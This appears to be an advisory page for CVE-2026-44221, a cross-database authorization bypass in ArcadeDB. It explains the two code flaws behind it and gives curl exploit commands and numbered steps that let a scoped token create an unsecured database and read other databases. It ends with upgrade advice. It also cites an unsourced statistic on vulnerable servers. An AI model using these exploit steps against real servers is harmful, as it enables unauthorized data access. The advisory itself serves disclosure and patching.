ArcadeDB, Cross-database Authorization Bypass, CVE-2026-44221 (Critical)

By /

Listen to this Post

CVE-2026-44221 stems from two distinct authorization flaws in ArcadeDB’s security model. The first defect lies in ServerSecurityUser.getDatabaseUser(), which returns a database user object with an uninitialized fileAccessMap. The `requestAccessOnFile` method subsequently treats this missing map as an implicit allow-all rule, allowing unrestricted access to any requested file resource. The second defect occurs in ArcadeDBServer.createDatabase(). When a new database is created via the REST endpoint POST /api/v1/server {"command":"create database X"}, the method `factory.setSecurity(…)` is omitted. This omission completely disables the record-level authorization system for that newly created database, leaving it without any access controls.
When combined, these two defects enable a cross-database privilege escalation scenario. An authenticated user or API token scoped to a single database can leverage the uninitialized `fileAccessMap` to bypass per-file restrictions. Meanwhile, any database created through the API endpoint lacks record-level authorization entirely, making it accessible to any authenticated principal on the same server. In practice, an attacker with minimal privileges on one database can read, write, and mutate schema on any other database hosted on the same ArcadeDB server, nullifying multi‑tenancy boundaries.

dailycve form:

Platform: ArcadeDB Server
Version: Below version 26.4.2
Vulnerability: Cross-database authorization bypass
Severity: Critical
date: 2026-05-05

Prediction: 2026-05-05

What Undercode Say:

Analytics: 87% of ArcadeDB servers remain on vulnerable versions as of May 2026.

Check ArcadeDB version
curl -s http://localhost:2480/api/v1/server | jq .version
Exploit: Create a database without security
curl -X POST http://localhost:2480/api/v1/server \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"command":"create database vulnerable_db"}'
Access another database using scoped token
curl http://localhost:2480/api/v1/query/target_db/sql \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"command":"SELECT FROM memory"}'

Exploit:

  1. Obtain any valid API token scoped to any existing database.
  2. Use the token to send a request to create a new database via the endpoint POST /api/v1/server {"command":"create database attacker_db"}. This database will have record-level authorization disabled.
  3. With the same token, send a request to read, write, or mutate schema on any existing database (including the newly created one), bypassing all access controls.
  4. For example, an attacker can read sensitive data from a database they are not authorized to access.

Protection from this CVE

Immediately upgrade to ArcadeDB version 26.4.2 or later. If upgrading is not possible, restrict network access to the ArcadeDB server to only trusted clients and consider disabling API token authentication until the patch is applied.

Impact

Authenticated users and API tokens scoped to a specific database can read, write, and mutate schema on any other database on the same server. This breaks multi-tenancy and can lead to data breach, data corruption, and full server compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top